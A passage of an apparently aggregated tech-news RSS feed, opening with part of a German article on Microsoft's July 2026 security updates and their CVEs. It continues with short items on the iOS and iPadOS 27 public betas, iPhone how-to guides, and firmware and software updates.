Netzwerk­treiber</td><td>kritisch</td><td>RCE</td><td>nein</td><td>nein</td><td>9.8</td></tr><tr><td>CVE-2026-50518</td><td>Windows, DHCP Server</td><td>kritisch</td><td>RCE</td><td>nein</td><td>nein</td><td>9.8</td></tr><tr><td>CVE-2026-56190</td><td>Windows, RDP</td><td>hoch</td><td>RCE</td><td>nein</td><td>nein</td><td>9.8</td></tr><tr><td>CVE-2026-55008</td><td>Exchange Server</td><td>kritisch</td><td>Spoofing / XSS</td><td>nein</td><td>nein</td><td>9.6</td></tr><tr><td>CVE-2026-50661</td><td>Windows, BitLocker</td><td>hoch</td><td>SFB</td><td>nein</td><td><strong><mark class="has-inline-color has-vivid-red-color">ja</mark></strong></td><td>6.1</td></tr></tbody></table><figcaption class="wp-element-caption"><em>RCE: Remote Code Execution<br>EoP: Elevation of Privilege, Rechteausweitung<br>SFB: Security Feature Bypass<br>XSS: Cross-Site Scripting</em></figcaption></figure>
</div></div>



<h2 class="wp-block-heading toc">Edge-Updates stopfen über 400 Chromium-Lücken</h2>



<p>Das neueste Sicherheits-Update auf Edge 150.0.4078.65 ist vom 9. Juli und basiert auf Chromium 150.0.7871.115. Es behebt 27 Chromium-Schwachstellen, die bei der oben genannten Gesamtlückenanzahl ebenso wenig eingerechnet sind wie die <a href="https://www.pcwelt.de/article/3181425/update-auf-chrome-150-beseitigt-fast-400-lucken-im-browser.html" target="_blank" rel="noreferrer noopener">über 400 Chromium-Lücken</a> aus der ersten Juli-Woche – andernfalls lägen wir bei mehr als 1000. Und inzwischen steht bereits <a href="https://www.pcwelt.de/article/3191031/google-schliest-weitere-kritische-chrome-lucken.html" target="_blank" rel="noreferrer noopener">das nächste Chrome-/Chromium-Update</a> mit 15 behobenen Schwachstellen bereit.</p>



<h2 class="wp-block-heading toc">Schwachstellen in Windows</h2>



<p>Ein großer Anteil der Schwachstellen, diesmal über 400, verteilt sich über die verschiedenen Windows-Versionen (10, 11, Server), für die Microsoft noch Sicherheits-Updates anbietet. Windows 10 wird weiterhin ganz normal als betroffenes System genannt, obwohl die Unterstützung im Oktober 2025 offiziell ausgelaufen ist – das lief bei Windows 7 trotz ESU-Programm (Erweiterte Sicherheits-Updates) noch anders. Microsoft hat das ESU-Programm für Windows 10 auf privat genutzten Rechnern <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates-sensation.html" target="_blank" rel="noreferrer noopener">bis 12. Oktober 2027 verlängert</a>.</p>



<h3 class="wp-block-heading toc">Attacken auf Active Directory</h3>



<p>Die einzige Windows-Lücke in diesem Monat, die bereits für Angriffe ausgenutzt wird, ist die EoP-Schwachstelle CVE-2026-56155 in den Active Directory-Verbunddiensten (AD FS). Die ist als hohes Risiko eingestuft und Microsoft weist den CVSS-Score 7.8 aus. Die Zugriffskontrollen sind nicht feinmaschig genug und so kann ein Angreifer Administratorrechte erlangen. Anfällig sind Windows Server 2012 bis 2025 sowie ältere Windows-10-Versionen (1607, 1809).</p>



<h3 class="wp-block-heading toc">Kritische Windows-Lücken</h3>



<p>Unter den 413 Schwachstellen in Windows, die Microsoft in diesem Monat beseitigt, sind 24 als kritisch eingestufte RCE-Lücken und sieben kritische EoP-Lücken. Mit einem CVSS-Score von 9.9 (10 ist der Höchstwert) ragt die UAF-Lücke (use after free) CVE-2026-57092 in VMSwitch (Hyper-V) aus der Masse heraus. Ein erfolgreicher Angreifer mit niedrigen Rechten kann aus dem Gastsystem heraus höhere Berechtigungen auf dem Hostsystem erlangen.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Im Remote Desktop Protocol (RDP) wartet die RCE-Lücke CVE-2026-56190 auf entschlossene Angreifer. Diese können mittels speziell gestalteter RDP-Pakete mit Speicher interagieren, der nicht ordentlich initialisiert wurde. Sie erhalten damit die Möglichkeit, Speicher so zu manipulieren, dass eingeschleuster Code ausgeführt wird.</p>



<p>Wie die vorgenannte RDP-Schwachstelle kommt auch die RCE-Lücke CVE-2026-50518 im DHCP-Server auf den CVSS-Score 9.8. Sie ist eine von neun DHCP-Schwachstellen, die Microsoft in diesem Monat beseitigt. Im Windows Server-Netzwerktreiber steckt die RCE-Lücke CVE-2026-56188 mit dem CVSS-Score 9.8. Hier kann ein Angreifer mit speziell präparierten Datenpaketen ansetzen, um auf anfälligen Systemen eingeschleusten Code auszuführen. Und anfällig sind alle noch unterstützten Windows-Ausgaben, von Windows 10 bis Server 2025.</p>



<h2 class="wp-block-heading toc">Etliche Office-Lücken gestopft</h2>



<p>In seinen Office-Produkten hat Microsoft 97 Schwachstellen beseitigt, fast doppelt so viele wie im Juni. Darunter sind 17 als kritisch eingestufte RCE-Lücken (remote code execution). Bei diesen ist meist bereits das Vorschaufenster ein Angriffsvektor – ein Benutzer muss eine präparierte Datei nicht erst mit Office öffnen, um eine erfolgreiche Attacke zu ermöglichen. Die übrigen 48 RCE-Lücken können ausgenutzt werden, wenn ein Benutzer eine präparierte Office-Datei in einem anfälligen Office-Produkt öffnet (open-and-own).</p>



<p><a href="https://www.pcwelt.de/article/3188875/microsoft-bestaetigt-probleme-mit-secure-boot-update-auf-bestimmten-pcs-und-stoppt-rollout.html" target="_blank" rel="noreferrer noopener">▶Microsoft stoppt Rollout des Secure-Boot-Updates</a></p>



<p>Auch Lücken mit mittlerem Risiko verdienen Beachtung: Die lediglich als mittleres Risiko eingestufte EoP-Schwachstelle CVE-2026-56164 (elevation of privilege) in Sharepoint Server wird bereits für Angriffe ausgenutzt. Ein Angreifer kann übers Netzwerk ohne Benutzeranmeldung Zugriff erlangen. Wer die SFB-Lücke (security feature bypass) CVE-2026-55040 in Sharepoint Server (CVSS 9.1) ausnutzt, kann ohne Benutzeranmeldung auf Dateien zugreifen (kopieren und manipulieren). Die Sharepoint-Schwachstellen CVE-2026-50522/-58644 sind als kritisch ausgewiesene RCE-Lücken (CVSS 9.8). Für CVE-2026-50522 existiert ein funktionsfähiger Demo-Exploit, der beim Hacker-Wettbewerb Pwn2own erfolgreich vorgeführt, aber nicht im Detail veröffentlicht wurde.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie das Betriebssystem stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Spoofing im Exchange Server</h2>



<p>In Exchange Server hat Microsoft in diesem Monat vier Schwachstellen behoben, eine fünfte in Exchange Online. Als kritisch ist nur die Spoofing-Lücke CVE-2026-55008 (CVSS 9.6) ausgewiesen, der eine XSS-Schwachstelle (cross-site scripting) zugrunde liegt. Wenn eine speziell präparierte Mail in Outlook Web Access (OWA) geöffnet wird, kann ohne weitere Voraussetzungen beliebiger Javascript-Code im Browser ausgeführt werden.</p>



<h2 class="wp-block-heading toc">Endlich einmal etwas speziell für Gamer</h2>



<p>In dedizierten Server von Minecraft Bedrock hat Microsoft die RCE-Lücke CVE-2026-55010 (CVSS 9.8) bereits gestopft. Als Betreiber eines Minecraft-Servers müssen Sie nichts weiter unternehmen, sagt Microsoft. Bei <em>Age of Empires II: Definitive Edition</em> müssen Sie hingegen aktiv werden. Ein Angreifer kann die RCE-Lücke CVE-2026-50663 (CVSS-Score 8.8) ausnutzen, indem er eine speziell präparierte Spielszenario-Datei erstellt und andere dazu bringt, diese zu öffnen. Dadurch kann eine Datei mit schädlichem Code an unerwarteter Stelle abgelegt und womöglich ausgeführt werden.</p>



<p>Im Juli gibt es wieder ein neues <a href="https://www.pcwelt.de/article/1168933/microsoft-windows-tool-zum-entfernen-bosartiger-software-in-neuer-version.html" target="_blank" rel="noreferrer noopener">Windows-Tool zum Entfernen bösartiger Software</a>. Der nächste turnusmäßige Update-Dienstag ist am 11. August 2026.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to download iPadOS 27 right now - and which models support it]]></title>
<description><![CDATA[Apple just released the iPadOS 27 public beta, offering early access to an upgraded Siri, new Safari features, and more.]]></description>
<link>https://tsecurity.de/de/3668838/it-nachrichten/how-to-download-ipados-27-right-now-and-which-models-support-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668838/it-nachrichten/how-to-download-ipados-27-right-now-and-which-models-support-it/</guid>
<pubDate>Tue, 14 Jul 2026 20:11:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple just released the iPadOS 27 public beta, offering early access to an upgraded Siri, new Safari features, and more.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Change Email Password on iPhone Fast]]></title>
<description><![CDATA[Got a new email password and now your iPhone Mail app won’t fetch messages? Updating it only takes a few taps. This guide shows you how to change your email password on an iPhone, whether you’re using iCloud, Gmail, Outlook, Yahoo, or another provider.



Table of contentsBefore you startHow to C...]]></description>
<link>https://tsecurity.de/de/3668669/ios-mac-os/how-to-change-email-password-on-iphone-fast/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668669/ios-mac-os/how-to-change-email-password-on-iphone-fast/</guid>
<pubDate>Tue, 14 Jul 2026 18:34:44 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Got a new email password and now your iPhone Mail app won’t fetch messages? Updating it only takes a few taps. This guide shows you how to change your email password on an iPhone, whether you’re using iCloud, Gmail, Outlook, Yahoo, or another provider.



Table of contentsBefore you startHow to Change Email Password on iPhoneTipsFAQsSummaryConclusion



Before you start




Make sure you know your new password before updating it.



Confirm your iPhone is connected to the internet.



If you use two-factor authentication, keep your device or backup codes handy.



Update to the latest version of iOS for smoother Mail app compatibility. 




How to Change Email Password on iPhone




Tap the Settings app from your Home Screen.



On recent iOS versions: tap Mail &gt; Accounts.



On older iOS versions: tap Passwords &amp; Accounts.



Choose the account (Gmail, Outlook, Yahoo, iCloud, etc.) you need to update.



For iCloud: You must change it through your Apple ID settings.



For Gmail/Outlook/Yahoo: tap Account &gt; Password (or Re-enter password) and enter the new one.



Some providers will open a login screen in Safari. Enter your new password or app-specific password if prompted.



Return to the Mail app and try sending or receiving mail. If it works, your password is updated.




For further reading, check out where to find your passwords on iPhone.



Tips




If you can’t find the password field, delete and re-add your account instead. 



For Gmail, make sure “Allow apps” is enabled if you’re not using OAuth.



Use a password manager to keep email logins safe. 



For work accounts, ask your IT department about app-specific credentials.




FAQs



Why can’t I change my email password directly in iPhone Mail? Some providers (like iCloud, Gmail, Outlook, Yahoo) require you to update the password through their own login portals, not just in iOS settings.  How do I reset a forgotten email password? Go to your email provider’s website (Apple ID, Google, Microsoft, Yahoo) and use their Forgot password option. Then return to iPhone Settings to update it.  Do I need to delete and re-add my email account? Not usually. But if Mail won’t accept your new password, removing and re-adding the account often fixes it.  Will changing my Apple ID password affect Mail? Yes, if you use iCloud Mail, changing your Apple ID password automatically applies to Mail and other iCloud services.  Can I update multiple email accounts at once? No, you’ll need to update each account individually under Settings &gt; Mail &gt; Accounts.  







Summary




Open Settings



Go to Mail &gt; Accounts (or Passwords &amp; Accounts)



Tap your email account



Update your password (via provider login if required)



Save changes and test in the Mail app




Conclusion



Changing your email password on an iPhone is quick once you know where to look. Whether you’re using iCloud, Gmail, Outlook, or Yahoo, the process usually takes less than a minute, and keeps your account secure. If the Mail app refuses your new password, just re-add the account and you’re good to go.]]></content:encoded>
</item>
<item>
<title><![CDATA[Siri AI steals the show as the iOS 27 public beta lands]]></title>
<description><![CDATA[Apple has released the first public betas of its “27” series of operating systems, and feedback so far suggests they’re already very stable builds, even at this early end of the release cycle. 



For most intrepid public beta testers, the big attractions here are Siri AI and the heavily improved...]]></description>
<link>https://tsecurity.de/de/3668518/it-nachrichten/siri-ai-steals-the-show-as-the-ios-27-public-beta-lands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668518/it-nachrichten/siri-ai-steals-the-show-as-the-ios-27-public-beta-lands/</guid>
<pubDate>Tue, 14 Jul 2026 17:48:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Apple has released the first public betas of its <a href="https://beta.apple.com/" target="_blank" rel="noreferrer noopener">“27” series of operating systems</a>, and <a href="https://x.com/JoannaStern/status/2076771694740406579?s=20" target="_blank" rel="noreferrer noopener">feedback so far</a> suggests they’re already very stable builds, even at this early end of the release cycle. </p>



<p class="wp-block-paragraph">For most intrepid public beta testers, the big attractions here are <a href="https://www.computerworld.com/article/4184484/siri-ai-is-all-apple-it-just-needed-google-to-get-there.html">Siri AI</a> and the heavily improved Apple Intelligence tools – though Siri AI is <a href="https://www.applemust.com/apples-siri-ai-stand-off-with-europe-just-escalated/" target="_blank" rel="noreferrer noopener">not yet available in Europe</a> due to regulatory problems there. Overnight social media commentary has been highly positive, with Siri widely seen as delivering on what we always thought it should be rather than the limited product it became.</p>



<h2 class="wp-block-heading"><strong>Caveat emptor</strong></h2>



<p class="wp-block-paragraph">Once installed, the new operating system is fast and better performing on the iPhone, though there are some limitations anyone considering the beta should consider first:</p>



<ul class="wp-block-list">
<li>This is beta software; things can and sometimes do go wrong. So don’t install it on your primary device unless you know how to restore your device and its data.</li>



<li>Some critical apps such as banking tools, VPNs and some smart home management software are reported to be unstable at times.</li>



<li>Once the public beta is first installed, there’s a lengthy period during which your device will rebuild its database; this can take many hours and performance will be affected.</li>



<li>As the OS beds in, users might experience sudden battery drain or the device might seem warmer than usual.</li>



<li>You’ll need to join a lengthy Siri waitlist before you can install the updated Siri AI.</li>



<li>Siri AI requires significant hardware capabilities and only runs on iPhone 15 Pro, iPhone 16 and iPhone 17 models. Alternatively, you must have an M1 or later Mac or an iPad running an M1 chip or later, or A17 Pro (iPad mini).</li>
</ul>



<h2 class="wp-block-heading"><strong>Siri AI is a big improvement</strong></h2>



<p class="wp-block-paragraph">Siri AI is the big reward here. <a href="https://x.com/JoannaStern/status/2076771694740406579?s=20" target="_blank" rel="noreferrer noopener">Joanna Stern called</a> it “significantly better.” It will provide you with much better responses than its predecessor, and its contextual understanding is sophisticated and advanced. </p>



<p class="wp-block-paragraph">That’s because Siri can search across your messages, emails, photos and more to help you find what you’re looking for and has some understanding of where you are and what you are doing to help it make even more accurate decisions. It is faster than it’s ever been with a dedicated app (which includes logs of your interactions) and a new glowing design when activated. </p>



<p class="wp-block-paragraph">The assistant can now hold an ongoing conversation with you, understands what’s on screen, and take some actions in apps. One way that might be useful is if you are looking at a recipe online, you can ask Siri to write up a shopping list for the recipe ingredients and paste it in a Note. Siri has become much more knowledgeable than in the past thanks to its expanded and updated world knowledge database.</p>



<p class="wp-block-paragraph">Apple Intelligence has been beefed up, too, with keyboard tools much improved on the last version. Siri can even reflect your personal tone and style based on the person you’re communicating with when sending a Mail or Messages post. </p>



<h2 class="wp-block-heading"><strong>Apple and the image</strong></h2>



<p class="wp-block-paragraph">The Camera app now has a new Siri mode; it can do things like identify objects and people, or import event details from a leaflet. You can easily search or ask questions about what’s around you, and there are useful new actions you can take, such as getting nutritional insights about a plate of food.</p>



<p class="wp-block-paragraph">Image Playground wasn’t terribly impressive when it first appeared, and a lot of people did little with it. It seems much better now, capable of generating photo-realistic images in virtually any style from natural language prompts or editing existing images. It’s a useful step up.</p>



<p class="wp-block-paragraph">Another impressive feature is Spatial Reframing. This lets you shift the composition of a photo after you’ve taken it, using AI to create accurate renditions of what is outside the frame. A new Extend tool lets you expand images, which is useful for adjusting aspect ratios or creating Lock Screen wallpapers.</p>



<h2 class="wp-block-heading"><strong>The future on your wrist</strong></h2>



<p class="wp-block-paragraph">If you use an Apple Watch, you’ll be impressed, as the contextual AI extends to that device. So, you can have context-savvy conversations with your watch and ask it to do tasks on your behalf. It makes it feel like a bona fide computer on your wrist and bodes well for other <a href="https://www.applemust.com/apple-watch-is-already-the-worlds-dominant-wearable-ai-device/" target="_blank" rel="noreferrer noopener">future wearable products from the company</a>. </p>



<p class="wp-block-paragraph">There are lots of other interesting features in the beta. Call Context can automatically surface the information you need, like a confirmation code or reservation number, when calling up a business. And a new Notify Me feature in Safari lets you know when a web page changes, so you can watch for stock availability or ticket sales.</p>



<h2 class="wp-block-heading"><strong>How to install the beta</strong></h2>



<p class="wp-block-paragraph">If you’re interested in installing the new OSes, <a href="https://beta.apple.com/" target="_blank" rel="noreferrer noopener">Apple’s Beta Software Program</a> website should be your first port of call. You’ll need to sign in to access the betas using your Apple Account. Once you’ve done that, open Settings and go to Software Update; there you can select Beta Updates and choose the 27 series Public beta. Tap Update Now and the installation will begin.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social">BlueSky</a>, <a href="http://www.linkedin.com/in/jonnyevans">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans">Mastodon</a>, and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wenn Samsung diese nervige Schwäche behebt, kaufe ich mir ein Galaxy Z Flip 8]]></title>
<description><![CDATA[Das Galaxy Z Flip 8 könnte endlich das werden, was die Flip-Reihe schon immer hätte sein sollen – ein Klapphandy, das man nicht ständig aufklappen muss.]]></description>
<link>https://tsecurity.de/de/3668257/it-nachrichten/wenn-samsung-diese-nervige-schwaeche-behebt-kaufe-ich-mir-ein-galaxy-z-flip-8/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668257/it-nachrichten/wenn-samsung-diese-nervige-schwaeche-behebt-kaufe-ich-mir-ein-galaxy-z-flip-8/</guid>
<pubDate>Tue, 14 Jul 2026 16:18:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Galaxy Z Flip 8 könnte endlich das werden, was die Flip-Reihe schon immer hätte sein sollen – ein Klapphandy, das man nicht ständig aufklappen muss.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Clear Cache on iPhone [Safari & Apps]]]></title>
<description><![CDATA[Clearing the iPhone cache can help if your device feels slow, keeps running out of storage, or websites load oddly. 



For those who don't know, cache is temporary data saved by browsers, apps, or system services to make things load faster. Over time, it builds up and can slow your phone down! 
...]]></description>
<link>https://tsecurity.de/de/3668135/ios-mac-os/how-to-clear-cache-on-iphone-safari-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668135/ios-mac-os/how-to-clear-cache-on-iphone-safari-apps/</guid>
<pubDate>Tue, 14 Jul 2026 15:39:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Clearing the iPhone cache can help if your device feels slow, keeps running out of storage, or websites load oddly. 



For those who don't know, cache is temporary data saved by browsers, apps, or system services to make things load faster. Over time, it builds up and can slow your phone down! 



Let’s go step by step and see the best ways to clear cache on iPhone.



Table of contentsHow to clear cache on your iPhone?1. Clear Safari cache and website data2. Use advanced Safari website data removal3. Clear the cache from other browsers4. Clear cache for individual apps5. Clear keyboard cache6. Restart your iPhone to clear system cacheTipsFrequently Asked QuestionsSummaryConclusion



How to clear cache on your iPhone?



1. Clear Safari cache and website data




Open the Settings app.



Scroll down, expand Apps, and tap Safari.



Tap Clear History and Website Data.



Confirm your choice.




This removes browsing history, cookies, and cached web data.



2. Use advanced Safari website data removal




In Settings &gt; Apps &gt; Safari, scroll down to the bottom and tap Advanced.



Tap Website Data.



Swipe left on individual sites to delete them, or tap Remove All Website Data to clear everything.




3. Clear the cache from other browsers




Chrome: Open Chrome, tap the three-dots menu, go to History, then Delete Browsing Data. Select Cached Images and Files and confirm.



Firefox: Open Firefox, tap the menu (three lines), go to Settings, then Data Management. Toggle Cache and clear.



Edge: Open Edge, tap the menu, go to Settings &gt; Privacy, then choose Clear Browsing Data and confirm.



Opera: Open Opera, go to Settings &gt; Clear Browser Data, then select cached files and clear them.



Brave: Open Brave, go to Settings &gt; Privacy, enable cache clearing, then tap Clear Data Now.




Deleting Chrome cache on iPhone



4. Clear cache for individual apps



Most apps do not have a direct “clear cache” button. Instead:




Go to Settings &gt; General &gt; iPhone Storage. 



Select an app, and: 

Tap Offload App to remove the app but keep its data. 



Tap Delete App to remove the app and its cache completely. You can reinstall it from the App Store.






Clearing cache for individual apps on iPhone



5. Clear keyboard cache



Your keyboard learns words and suggestions over time. To reset it:




Go to Settings &gt; General &gt; Transfer or Reset iPhone &gt; Reset.



Tap Reset Keyboard Dictionary and confirm.




Clearing iPhone's keyboard cache



6. Restart your iPhone to clear system cache



Restarting helps flush small system temporary files.




For Face ID models: press and hold the Side button with a Volume button, slide to power off, wait, then turn it back on.



For Home button models: press and hold the Power button until the slider appears.




Tips




Use iPhone Storage under Settings to check which apps use the most space.



Offload apps you rarely use to free storage without losing important data.



Be cautious with third-party “cache cleaner” apps, as most are unnecessary.



Clearing the cache may sign you out of accounts, so keep your login details handy.



Restart your iPhone once in a while for smoother performance.




Frequently Asked Questions



What is cache and why should I clear it? Cache is temporary data that apps and browsers save to speed things up. Clearing it can fix glitches, free up storage, and improve performance.  Will clearing the cache log me out of websites? Yes. Clearing browser cache or website data may sign you out of sites and remove some saved preferences.  How do I clear cache for apps that don’t have a clear option? You can offload the app in Settings to remove it but keep documents and data, or delete and reinstall it to fully clear the cache.  Does restarting clear all cache? Restarting clears small temporary system files, but it does not fully clear the browser or app cache. For that, you need to manually delete the files in Settings.  



Summary




Clear Safari or other browser cache in Settings.



Remove website data selectively using Safari’s advanced settings.



Offload or delete apps to clear their cache.



Reset the keyboard dictionary if predictive text is cluttered.



Restart your iPhone to refresh the system cache.




Conclusion



Clearing the cache on an iPhone is simple and effective for fixing app issues, boosting performance, and freeing up space. Whether you clear Safari data, reset other browsers, offload apps, or just restart your phone, each method plays a role in keeping your device smooth and responsive. 



Make it a habit to clear the cache once in a while, especially if your iPhone starts to feel sluggish.]]></content:encoded>
</item>
<item>
<title><![CDATA[Soon, iOS 26.6 Will Warn You About Malicious iMessages On iPhone]]></title>
<description><![CDATA[It looks like Apple is stepping up its fight against sophisticated text-based attacks in its next software update. If you use a smartphone from the company, you should know that iOS 26.6 will warn you about malicious iMessages. This upcoming security feature aims to flag potentially dangerous tex...]]></description>
<link>https://tsecurity.de/de/3667246/ios-mac-os/soon-ios-266-will-warn-you-about-malicious-imessages-on-iphone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667246/ios-mac-os/soon-ios-266-will-warn-you-about-malicious-imessages-on-iphone/</guid>
<pubDate>Tue, 14 Jul 2026 10:06:51 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It looks like Apple is stepping up its fight against sophisticated text-based attacks in its next software update. If you use a smartphone from the company, you should know that iOS 26.6 will warn you about malicious iMessages. This upcoming security feature aims to flag potentially dangerous texts before they can compromise your privacy or harm your device.



It represents another critical layer of defense for anyone worried about targeted phishing attempts or zero-click exploits.



How iOS 26.6 will warn you about malicious iMessages



Code found inside the recent iOS 26.6 beta 5 reveals exactly how this security tool functions. If the system detects a suspicious text, it triggers a screen notification indicating the message might be trying to harm your device.



From there, you get three simple choices to deal with the threat. You can select “Not Now,” “Share With Apple,” or “Don't Report.” If you decide to share the data, it helps the company study the exploit to tighten its own security for the broader iOS 26 ecosystem. Choosing “Not Now” simply pushes the prompt away to reappear later.



While this is a smart defense mechanism for your iPhone, there is a slight downside to how it looks. Early mockups show the alert appears surprisingly similar to the fake antivirus pop-ups that often clutter Safari web pages.



This visual overlap might cause some people to dismiss the real warning entirely. The public update should arrive by the end of July, so it is best to stay cautious with unknown links until the official release drops.]]></content:encoded>
</item>
<item>
<title><![CDATA[Philips Hue Bridge Pro: Wichtiges Firmware-Update gegen die Update-Sackgasse]]></title>
<description><![CDATA[Kurzer Hinweis für alle, die das Smart Home mit der Philips Hue Bridge Pro steuern. Signify rollt aktuell ein wichtiges Firmware-Update für das Pro-Modell der Steuerungszentrale aus. Die neue Software-Version trägt die Nummer 2071401010 und behebt ein durchaus kritisches Problem...Zum Beitrag: Ph...]]></description>
<link>https://tsecurity.de/de/3667188/it-nachrichten/philips-hue-bridge-pro-wichtiges-firmware-update-gegen-die-update-sackgasse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667188/it-nachrichten/philips-hue-bridge-pro-wichtiges-firmware-update-gegen-die-update-sackgasse/</guid>
<pubDate>Tue, 14 Jul 2026 09:35:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kurzer Hinweis für alle, die das Smart Home mit der Philips Hue Bridge Pro steuern. Signify rollt aktuell ein wichtiges Firmware-Update für das Pro-Modell der Steuerungszentrale aus. Die neue Software-Version trägt die Nummer 2071401010 und behebt ein durchaus kritisches Problem...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/philips-hue-bridge-pro-wichtiges-firmware-update-gegen-die-update-sackgasse/">Philips Hue Bridge Pro: Wichtiges Firmware-Update gegen die Update-Sackgasse</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Freier Text-Editor: Notepad++ 8.9.7 behebt mehrere Sicherheitslücken und Fehler]]></title>
<description><![CDATA[Mit Version 8.9.7 veröffentlicht Entwickler Don Ho ein umfangreiches Update für Notepad++, das mehrere Sicherheitslücken schließt und zahlreiche Fehler behebt. Darüber hinaus verbessert die neue Version die Stabilität, erweitert den Funktionsumfang der Suchfunktion und optimiert verschiedene Bere...]]></description>
<link>https://tsecurity.de/de/3667085/it-nachrichten/freier-text-editor-notepad-897-behebt-mehrere-sicherheitsluecken-und-fehler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667085/it-nachrichten/freier-text-editor-notepad-897-behebt-mehrere-sicherheitsluecken-und-fehler/</guid>
<pubDate>Tue, 14 Jul 2026 09:02:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/7/7/3-f61f98729714d6dd/article-640x360.4a394054.jpg"><p>Mit Version 8.9.7 veröffentlicht Entwickler Don Ho ein umfangreiches Update für Notepad++, das mehrere Sicherheitslücken schließt und zahlreiche Fehler behebt. Darüber hinaus verbessert die neue Version die Stabilität, erweitert den Funktionsumfang der Suchfunktion und optimiert verschiedene Bereiche der Benutzeroberfläche.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Rolls Out iPadOS 27 Public Beta: How to Install and What’s New]]></title>
<description><![CDATA[Apple has released the first iPadOS 27 public beta, giving iPad users an early look at Siri AI, faster system performance, new Apple Intelligence tools, improved parental controls, and several useful app upgrades. The public beta is free, but users should create a backup before installing it beca...]]></description>
<link>https://tsecurity.de/de/3666614/ios-mac-os/apple-rolls-out-ipados-27-public-beta-how-to-install-and-whats-new/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666614/ios-mac-os/apple-rolls-out-ipados-27-public-beta-how-to-install-and-whats-new/</guid>
<pubDate>Tue, 14 Jul 2026 02:08:29 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released the first iPadOS 27 public beta, giving iPad users an early look at Siri AI, faster system performance, new Apple Intelligence tools, improved parental controls, and several useful app upgrades. The public beta is free, but users should create a backup before installing it because early software can contain bugs and affect battery life.



How to Install the iPadOS 27 Public Beta



Before updating, back up your iPad through iCloud or a Mac or PC. Apple also recommends testing beta software on a secondary device whenever possible.




Visit the Apple Beta Software Program website.



Select Sign Up or Sign In.



Use the same Apple Account connected to your iPad.



Accept the program terms and enrol your device.



Open Settings on your iPad.



Go to General &gt; Software Update &gt; Beta Updates.



Select iPadOS 27 Public Beta.



Return to the Software Update page and tap Update Now.




The first public beta matches the revised third developer beta released on July 13. Apple’s beta program is free and includes the Feedback Assistant app for reporting problems.



Everything New in the iPadOS 27 Public Beta




Siri AI: Apple’s redesigned assistant supports natural conversations, follow-up questions, personal context, onscreen awareness, web searches, and actions across supported apps. A dedicated Siri app stores conversations and lets users continue chats across Apple devices. Siri AI requires an iPad with an M1 chip or newer, or an iPad mini with the A17 Pro chip.



